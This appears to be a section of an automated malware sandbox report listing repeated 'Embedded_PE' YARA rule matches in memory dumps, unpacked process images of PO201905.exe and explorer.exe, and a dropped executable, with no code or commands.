Source: 00000006.00000000.4489653245.050E0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482163480.00340000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499198783.03230000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495408457.00340000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485235319.02E50000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495818939.00720000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483709645.020D0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482523631.00720000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000003.4508449289.00256000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499267957.03330000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496687348.01D70000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485229761.02E40000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485325684.03030000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496894367.020E0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499078335.03090000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4497202502.021F0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495256653.00120000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496097002.009B0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.4700605804.000F0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483572029.01D70000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518214232.0025C000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499056992.03030000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485467608.03330000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482532068.00730000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485342639.03090000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489179656.04B70000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518110322.00210000.00000040.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4497183880.021E0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489291554.04D40000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000002.00000002.4480303987.004B0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483716872.020E0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482412222.00680000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495735054.00680000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499297653.033B0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4492371223.086E0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000003.4481262828.00CA0000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4520262603.026A1000.00000040.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485576438.033B0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe, type: DROPPEDMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe, type: DROPPEDMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1c90000.46.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.fb0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.5460000.36.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.340000.2.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4d40000.28.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e50000.54.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2f00000.17.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1c90000.8.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.5280000.33.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.4.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.38.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3230000.22.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.960000.6.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3230000.60.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4b80000.26.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1f30000.10.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.960000.6.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1d70000.47.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e50000.54.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.f0000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.200000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.0.9rxlgd1bcduf.exe.1060000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4fd0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.0.PO201905.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20e0000.50.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4fe0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4fe0000.30.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.210000.2.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.51e0000.32.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e50000.16.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.1.9rxlgd1bcduf.exe.1060000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.52.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3160000.21.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.52.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2fd0000.56.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1d70000.9.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.15.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3090000.20.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2f00000.17.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.1.PO201905.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.42.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.120000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3030000.19.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2f00000.55.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.53.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20d0000.11.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21e0000.13.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21e0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.730000.43.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2fd0000.56.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.340000.2.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.14.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.42.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.53a0000.34.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3090000.20.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2fd0000.18.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.f0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4b70000.25.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3230000.22.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.340000.40.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.5460000.36.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.53.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.15.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.53e0000.35.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.730000.43.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3330000.23.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.4.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1f30000.48.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3090000.58.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.1.PO201905.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.53e0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.120000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.340000.40.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2fd0000.18.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.120000.39.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20e0000.12.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3090000.58.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4fd0000.29.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.200000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3030000.19.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1c90000.46.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4c00000.27.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.730000.5.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.120000.39.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20d0000.49.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.1.9rxlgd1bcduf.exe.1060000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
